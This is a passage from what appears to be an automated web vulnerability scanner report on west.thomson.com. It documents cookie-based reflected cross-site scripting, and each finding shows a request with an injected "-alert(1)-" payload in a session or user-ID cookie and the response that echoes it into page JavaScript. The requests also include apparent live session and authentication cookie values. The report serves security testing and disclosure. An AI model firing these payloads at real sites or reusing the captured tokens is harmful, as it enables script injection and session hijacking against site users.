Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /store/product.aspx?R=160547&Product_id=12484463&PromCode=645229L86530&PromType=internal HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwndc5a9"-alert(1)-"7be52016318; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; UserSiteIdIdentifier=

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:43:23 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: ASP.NET_SessionId=ebc2cwnzpayjeyygpipklpfw; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 78087


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta c
...[SNIP]...
ascript'>
var R3_COMMON = new r3_common();
R3_COMMON.setApiKey("756bd9ec9a083c52");
R3_COMMON.setBaseUrl("http://recs.richrelevance.com/rrserver/");
R3_COMMON.setSessionId("bijb1vookoje2tnvwh5oouwndc5a9"-alert(1)-"7be52016318");
R3_COMMON.setUserId("{71c28bcc-895f-4239-9850-58ed6aba178d}");


r3();
</script>
...[SNIP]...

5.259. http://west.thomson.com/store/product.aspx [anonymous_userid_1 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /store/product.aspx

Issue detail

The value of the anonymous_userid_1 cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3285e"-alert(1)-"c52e77c0b7f was submitted in the anonymous_userid_1 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /store/product.aspx?R=160547&Product_id=12484463&PromCode=645229L86530&PromType=internal HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}3285e"-alert(1)-"c52e77c0b7f; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; UserSiteIdIdentifier=

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:48:36 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 78116


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta c
...[SNIP]...
("756bd9ec9a083c52");
R3_COMMON.setBaseUrl("http://recs.richrelevance.com/rrserver/");
R3_COMMON.setSessionId("bijb1vookoje2tnvwh5oouwn");
R3_COMMON.setUserId("{71c28bcc-895f-4239-9850-58ed6aba178d}3285e"-alert(1)-"c52e77c0b7f");


r3();
</script>
...[SNIP]...

5.260. http://west.thomson.com/store/secure/ShoppingBasket.aspx [ASP.NET_SessionId cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /store/secure/ShoppingBasket.aspx

Issue detail

The value of the ASP.NET_SessionId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b25a"-alert(1)-"ecd2518c6a1 was submitted in the ASP.NET_SessionId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /store/secure/ShoppingBasket.aspx?PromCode=571423 HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn2b25a"-alert(1)-"ecd2518c6a1; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; UserSiteIdIdentifier=; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:20:49 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: .WTCAUTH=A4F2DD57ED0263FA61ED6CAB24498ED784832B1F6C310B8E65120F6805A574E9638A7AB4C3CC175373B865898C44D339F6A9F26BE76DF4E499DC1A6D05B941F5F842639B825C31009DAAA566E95FB74DF356033C16F22F60644E1CBF8A4D035FFA487C02A81FE388604890DF7B23A94B0DA8CCA2DED074794AE0AD8C192B73DC7DD3FEC7BB4FE8F545F6B8E6EB9461A17731D0F0FEA08E8A1A1E449755F4B679F334DC04DBE919315D505529E5E96A8A1239BBDAEF0E6900DEA0523B0E614A318447617E3C0D43590D8CF9BAF4591587E8A22458F03985BD5252FBF20B4A1B878A90ACE4; expires=Tue, 26-Apr-2011 20:50:49 GMT; path=/; HttpOnly
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=154CD5BADEBFAEF83FDE235510D5951017483868771BE4B568E3ADC9B2E4A9D772A8D58CBC8CE6FBAFD4C3804D10658FEB4128BE0B14B0420C8B709BD9C099C351C91303A5B635827BFF6046E286CAF6B6139AA7C7E8A201D2109AE352BA480B10C72B4BA8A0A05C37F192B189B7447241B38C32980B55AE068E2B576CC388DF620298AE1C9E67E2608423B860840F43C52B318E443C2ED2B38472A89B6B66EFE6F9B3A84B4AB3E6CA72B666F573CC2BCF7A9A644B8119F21A324600196D5C0903E4BF798A76222C37CC43825A5D8EA860EC5CE873FBC2BB01171CF04943338DCF7E4983; path=/
Set-Cookie: ASP.NET_SessionId=o4ukbml35ljm0z3zebxzyply; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 78097


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta c
...[SNIP]...
ascript'>
var R3_COMMON = new r3_common();
R3_COMMON.setApiKey("756bd9ec9a083c52");
R3_COMMON.setBaseUrl("http://recs.richrelevance.com/rrserver/");
R3_COMMON.setSessionId("bijb1vookoje2tnvwh5oouwn2b25a"-alert(1)-"ecd2518c6a1");
R3_COMMON.setUserId("{71c28bcc-895f-4239-9850-58ed6aba178d}");


r3();
</script>
...[SNIP]...

5.261. http://west.thomson.com/store/secure/ShoppingBasket.aspx [anonymous_userid_1 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /store/secure/ShoppingBasket.aspx

Issue detail

The value of the anonymous_userid_1 cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a93fe"-alert(1)-"ce20752a9b2 was submitted in the anonymous_userid_1 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /store/secure/ShoppingBasket.aspx?PromCode=571423 HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}a93fe"-alert(1)-"ce20752a9b2; UserSiteIdIdentifier=; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:37:43 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 78100


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta c
...[SNIP]...
("756bd9ec9a083c52");
R3_COMMON.setBaseUrl("http://recs.richrelevance.com/rrserver/");
R3_COMMON.setSessionId("bijb1vookoje2tnvwh5oouwn");
R3_COMMON.setUserId("{71c28bcc-895f-4239-9850-58ed6aba178d}a93fe"-alert(1)-"ce20752a9b2");


r3();
</script>
...[SNIP]...

5.262. http://west.thomson.com/support/contact-us/default.aspx [ASP.NET_SessionId cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /support/contact-us/default.aspx

Issue detail

The value of the ASP.NET_SessionId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9d95"-alert(1)-"599a6a07add was submitted in the ASP.NET_SessionId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwnd9d95"-alert(1)-"599a6a07add; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:23:11 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: .WTCAUTH=0637D03D9DD245B9A681851AC4B6097449315C3957EAF9D70D5B5B7143F2A36510D73ED262DF735293B833BFDBCBDD8B93A17C7D56A9E77D98C61DC5FAD590600C8FAF335B87F7F57DB853BA4283AE805760A3BBFA11499E1FE22774E25DC5B8083195FA3914862BB80D4725341AE5FE2FF7AE471084209024A71314CEE538BA215482F7C6A258EC4C0F53CBA2A98C19D00E663B18BD18371A7918415032A6E0A0904F5F364D00A322D9BF368A77C879CBA454224E1DE4DC6A7012CDDE7496AC4ED9EEB376EC9AEFFD0D028F5EFACD099DB4C4AC9070D2893F49FE134F581B9E6163C0DD; expires=Tue, 26-Apr-2011 20:53:11 GMT; path=/; HttpOnly
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=A07C80A9D15BB9DD38A787FE10FEF8EA07FB89449F9125866B88957F87E9C5CC464E3DCEB11A207F0BF84EA5AC7D058128C60D0776F4B96B50CB7C12137FF1954BB1945684B5657582CB5962904F98769E73D0E2EF341DDDE214C9586271E3715F94FD8B6240F517E1C47D8E5CAF385D9BFF81E8D83853A6A67CF80B25117E580F379AA754497327DED351D0AD84FDA38E85DEDDDD3812C22CCC4EDB62E5809A083C84D939E1D6F57710ABD74C109356D01528EC0E4D55786FFA23076511B2FBA468043D79F1965CF8EED09419D54DC755AE66BB1BA01BAE106418689BD87B9019837AFD; path=/
Set-Cookie: ASP.NET_SessionId=wf0pa2eos3vudxiwmk4jx5zz; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 90679


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><m
...[SNIP]...
ascript'>
var R3_COMMON = new r3_common();
R3_COMMON.setApiKey("756bd9ec9a083c52");
R3_COMMON.setBaseUrl("http://recs.richrelevance.com/rrserver/");
R3_COMMON.setSessionId("bijb1vookoje2tnvwh5oouwnd9d95"-alert(1)-"599a6a07add");
R3_COMMON.setUserId("{71c28bcc-895f-4239-9850-58ed6aba178d}");


r3();
</script>
...[SNIP]...

5.263. http://west.thomson.com/support/contact-us/default.aspx [anonymous_userid_1 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /support/contact-us/default.aspx

Issue detail

The value of the anonymous_userid_1 cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbf7f"-alert(1)-"293cb6420bc was submitted in the anonymous_userid_1 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /support/contact-us/default.aspx HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
Referer: http://kbportal.thomson.com/display/2/opt.aspx?opt=2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}dbf7f"-alert(1)-"293cb6420bc; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; c=undefined571419undefined; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; UserSiteIdIdentifier=; .WTCAUTH=8DA0D6C87E99C493208DAEC5FA170FA9EAC9955C71739C474E96F0FE0773DDFE6E5AD5B47211A2A4E9236311C33310D0708BF762549AADBB9B257E30B1F960E0A4695D728A73D01A9C0CADAE04590A15D0397374EEB90D4E7A6A7E9722A350C51AAFC7579BB3AFA2A967F5C7A7A97F15696AABDB28BF277CCFB0ECD0CCB08AD802AB780AC4AA6638CA484DC7AF960E817B21FBAF4CE0F4C52C330C2F4B8FEA4751D8EFB365A3FB124B159B333E67E02F0F8DCCA416BC2A7B7490D3953EC7EC32980CE4EE4F9B5D5BC52B4C2546DBA6AA5D4FDFCCBEA404D2A29CB3A36163862069F16B4A; s_cc=true; c_m2=1; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=store%3Asecure%3Aemptybasket; s_sq=%5B%5BB%5D%5D; s_ppv=100

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:47:30 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 90537


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><m
...[SNIP]...
("756bd9ec9a083c52");
R3_COMMON.setBaseUrl("http://recs.richrelevance.com/rrserver/");
R3_COMMON.setSessionId("bijb1vookoje2tnvwh5oouwn");
R3_COMMON.setUserId("{71c28bcc-895f-4239-9850-58ed6aba178d}dbf7f"-alert(1)-"293cb6420bc");


r3();
</script>
...[SNIP]...

5.264. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx [ASP.NET_SessionId cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://west.thomson.com
Path:   /store/Promotions/EmailPreferences/Login.aspx

Issue detail

The value of the ASP.NET_SessionId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d229a"-alert(1)-"e585a11d57f was submitted in the ASP.NET_SessionId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /store/Promotions/EmailPreferences/Login.aspx?Mstr=wtc&PromCode=571419&FindingMethod=Navigation HTTP/1.1
Host: west.thomson.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwnd229a"-alert(1)-"e585a11d57f; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:21:46 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: .WTCAUTH=284D2C119D3D2C2114AE4233E814DF990CBD237FD933746473F620BAAECC5AC0C47F01B7EECCC7B33514EDCB7BE4C324F4639B569203B28E6A23CAC79D5DAEC2CFB07CCFEFB8557CA8CAA25F002568D9903AA6D6EAEC00A9808AFB37407CAEE542442A75994F44ECC8B4587CCAFE8C4D057B479EE607DE2C1C275D55E609302DB64C397C3F616C8DFEA0FD532217D8EB52AE2789B4D9E982AD611F54FA76410CDB8EB2C19AE34B4ECDA3E0B1D3B5AF1EF188872B515797C82ECD3A666364928E78EA40A6EA28FEA90C504224967F02A5BAC090FAA0F14B3ED53A74476EDFE8B78AEF2E3A; expires=Tue, 26-Apr-2011 20:51:46 GMT; path=/; HttpOnly
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=940BED5928525B1FF7DD7D6C62FF514D1B6809A7C72A76B02804870A311C3EA2268BF06D728F4580913F176920526CB9DC40BA07B796AE6F6C3E981CAC08E7003688DF890A0EC63ECF2D6D28037B11B7040C8023908BFF75CE67BDA59D0E81124762EABDDC8B2410DC6D7EAE2A439F95EB9A799897172F6BFD71236FEAF93586AD4B2803103CCB780DC6057A70F83A4CC76B095AB2D62CC82264A6846F88E36CE2BCF098BAE65B2773FA8BAC6C64D45BDE7E5C6BC4FB43AD875BC840A7C123E9ED1729A78E47FAE8D8AD05567D53C9F419FAB86A700E76333551B55ABFB1AF190835816C; path=/
Set-Cookie: ASP.NET_SessionId=vaprkjr0wmp041lz1zda2jrr; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 69750


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
script'>
var R3_COMMON = new r3_common();
R3_COMMON.setApiKey("756bd9ec9a083c52");
R3_COMMON.setBaseUrl("https://recs.richrelevance.com/rrserver/");
R3_COMMON.setSessionId("bijb1vookoje2tnvwh5oouwnd229a"-alert(1)-"e585a11d57f");
R3_COMMON.setUserId("{71c28bcc-895f-4239-9850-58ed6aba178d}");


r3();
</script>
...[SNIP]...

5.265. https://west.thomson.com/store/secure/EmptyBasket.aspx [ASP.NET_SessionId cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://west.thomson.com
Path:   /store/secure/EmptyBasket.aspx

Issue detail

The value of the ASP.NET_SessionId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60c4d"-alert(1)-"00c0d436f58 was submitted in the ASP.NET_SessionId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /store/secure/EmptyBasket.aspx HTTP/1.1
Host: west.thomson.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
